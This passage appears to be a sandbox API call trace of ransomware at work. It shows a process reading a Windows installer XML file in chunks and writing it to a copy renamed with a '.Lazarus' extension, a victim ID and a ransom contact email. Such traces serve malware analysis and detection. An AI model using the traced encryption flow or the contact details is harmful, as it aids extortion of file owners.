lpMultiByteStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0065.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0065.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0065.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0065.950] AreFileApisANSI () returned 1 [0065.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0065.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 45 [0065.950] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.950] GetFileType (hFile=0x428) returned 0x1 [0065.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0065.951] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0065.951] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0065.951] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0065.951] CloseHandle (hObject=0x428) returned 1 [0065.951] AreFileApisANSI () returned 1 [0065.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0065.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 45 [0065.951] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.952] GetFileType (hFile=0x428) returned 0x1 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0065.952] CloseHandle (hObject=0x428) returned 1 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0065.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0065.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0065.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0065.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0065.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0065.953] AreFileApisANSI () returned 1 [0065.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0065.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 45 [0065.953] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0)) returned 1 [0065.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0065.953] AreFileApisANSI () returned 1 [0065.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0065.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0065.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0065.953] GetLastError () returned 0x0 [0065.953] SetLastError (dwErrCode=0x0) [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0065.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0065.953] GetLastError () returned 0x0 [0065.953] SetLastError (dwErrCode=0x0) [0065.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0065.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0065.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x716f0 [0065.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0065.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0065.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0065.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0065.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0065.954] AreFileApisANSI () returned 1 [0065.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0065.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0065.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0065.954] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.954] GetFileType (hFile=0x428) returned 0x1 [0065.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0065.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0065.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0065.955] AreFileApisANSI () returned 1 [0065.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0065.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 45 [0065.955] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.955] GetFileType (hFile=0x420) returned 0x1 [0065.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0065.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0065.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0065.955] GetLastError () returned 0x0 [0065.955] SetLastError (dwErrCode=0x0) [0065.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0065.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0065.955] GetLastError () returned 0x0 [0065.955] SetLastError (dwErrCode=0x0) [0065.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0065.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0065.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0065.957] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0065.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0065.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0065.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0065.959] GetLastError () returned 0x0 [0065.959] SetLastError (dwErrCode=0x0) [0065.959] GetLastError () returned 0x0 [0065.959] SetLastError (dwErrCode=0x0) [0065.960] GetLastError () returned 0x0 [0065.960] SetLastError (dwErrCode=0x0) [0065.960] GetLastError () returned 0x0 [0065.960] SetLastError (dwErrCode=0x0) [0065.960] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.960] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.961] GetLastError () returned 0x0 [0065.961] SetLastError (dwErrCode=0x0) [0065.962] GetLastError () returned 0x0 [0065.962] SetLastError (dwErrCode=0x0) [0065.962] GetLastError () returned 0x0 [0065.962] SetLastError (dwErrCode=0x0) [0065.962] GetLastError () returned 0x0 [0065.962] SetLastError (dwErrCode=0x0) [0065.962] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.962] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.962] GetLastError () returned 0x0 [0065.962] SetLastError (dwErrCode=0x0) [0065.963] GetLastError () returned 0x0 [0065.963] SetLastError (dwErrCode=0x0) [0065.963] GetLastError () returned 0x0 [0065.963] SetLastError (dwErrCode=0x0) [0065.963] GetLastError () returned 0x0 [0065.963] SetLastError (dwErrCode=0x0) [0065.963] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.963] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.963] GetLastError () returned 0x0 [0065.963] SetLastError (dwErrCode=0x0) [0065.963] GetLastError () returned 0x0 [0065.964] SetLastError (dwErrCode=0x0) [0065.964] GetLastError () returned 0x0 [0065.964] SetLastError (dwErrCode=0x0) [0065.964] GetLastError () returned 0x0 [0065.964] SetLastError (dwErrCode=0x0) [0065.964] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.964] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.964] GetLastError () returned 0x0 [0065.964] SetLastError (dwErrCode=0x0) [0065.964] GetLastError () returned 0x0 [0065.964] SetLastError (dwErrCode=0x0) [0065.965] GetLastError () returned 0x0 [0065.965] SetLastError (dwErrCode=0x0) [0065.965] GetLastError () returned 0x0 [0065.965] SetLastError (dwErrCode=0x0) [0065.965] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.965] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.965] GetLastError () returned 0x0 [0065.965] SetLastError (dwErrCode=0x0) [0065.965] GetLastError () returned 0x0 [0065.965] SetLastError (dwErrCode=0x0) [0065.966] GetLastError () returned 0x0 [0065.966] SetLastError (dwErrCode=0x0) [0065.966] GetLastError () returned 0x0 [0065.966] SetLastError (dwErrCode=0x0) [0065.966] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.966] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.966] GetLastError () returned 0x0 [0065.966] SetLastError (dwErrCode=0x0) [0065.966] GetLastError () returned 0x0 [0065.966] SetLastError (dwErrCode=0x0) [0065.966] GetLastError () returned 0x0 [0065.966] SetLastError (dwErrCode=0x0) [0065.967] GetLastError () returned 0x0 [0065.967] SetLastError (dwErrCode=0x0) [0065.967] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.968] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.968] GetLastError () returned 0x0 [0065.968] SetLastError (dwErrCode=0x0) [0065.968] GetLastError () returned 0x0 [0065.968] SetLastError (dwErrCode=0x0) [0065.968] GetLastError () returned 0x0 [0065.968] SetLastError (dwErrCode=0x0) [0065.969] GetLastError () returned 0x0 [0065.969] SetLastError (dwErrCode=0x0) [0065.969] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.969] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.969] GetLastError () returned 0x0 [0065.969] SetLastError (dwErrCode=0x0) [0065.969] GetLastError () returned 0x0 [0065.969] SetLastError (dwErrCode=0x0) [0065.969] GetLastError () returned 0x0 [0065.969] SetLastError (dwErrCode=0x0) [0065.969] GetLastError () returned 0x0 [0065.969] SetLastError (dwErrCode=0x0) [0065.969] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.970] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.971] GetLastError () returned 0x0 [0065.971] SetLastError (dwErrCode=0x0) [0065.971] GetLastError () returned 0x0 [0065.971] SetLastError (dwErrCode=0x0) [0065.971] GetLastError () returned 0x0 [0065.971] SetLastError (dwErrCode=0x0) [0065.971] GetLastError () returned 0x0 [0065.971] SetLastError (dwErrCode=0x0) [0065.971] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.971] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.971] GetLastError () returned 0x0 [0065.971] SetLastError (dwErrCode=0x0) [0065.972] GetLastError () returned 0x0 [0065.972] SetLastError (dwErrCode=0x0) [0065.972] GetLastError () returned 0x0 [0065.972] SetLastError (dwErrCode=0x0) [0065.972] GetLastError () returned 0x0 [0065.972] SetLastError (dwErrCode=0x0) [0065.972] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.972] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.973] GetLastError () returned 0x0 [0065.973] SetLastError (dwErrCode=0x0) [0065.974] GetLastError () returned 0x0 [0065.974] SetLastError (dwErrCode=0x0) [0065.974] GetLastError () returned 0x0 [0065.974] SetLastError (dwErrCode=0x0) [0065.974] GetLastError () returned 0x0 [0065.974] SetLastError (dwErrCode=0x0) [0065.974] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.974] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.974] GetLastError () returned 0x0 [0065.974] SetLastError (dwErrCode=0x0) [0065.974] GetLastError () returned 0x0 [0065.974] SetLastError (dwErrCode=0x0) [0065.975] GetLastError () returned 0x0 [0065.975] SetLastError (dwErrCode=0x0) [0065.975] GetLastError () returned 0x0 [0065.975] SetLastError (dwErrCode=0x0) [0065.975] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.975] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.975] GetLastError () returned 0x0 [0065.975] SetLastError (dwErrCode=0x0) [0065.975] GetLastError () returned 0x0 [0065.975] SetLastError (dwErrCode=0x0) [0065.975] GetLastError () returned 0x0 [0065.975] SetLastError (dwErrCode=0x0) [0066.084] GetLastError () returned 0x0 [0066.084] SetLastError (dwErrCode=0x0) [0066.084] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.087] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.089] GetLastError () returned 0x0 [0066.089] SetLastError (dwErrCode=0x0) [0066.089] GetLastError () returned 0x0 [0066.109] SetLastError (dwErrCode=0x0) [0066.109] GetLastError () returned 0x0 [0066.109] SetLastError (dwErrCode=0x0) [0066.109] GetLastError () returned 0x0 [0066.109] SetLastError (dwErrCode=0x0) [0066.109] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.110] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.110] GetLastError () returned 0x0 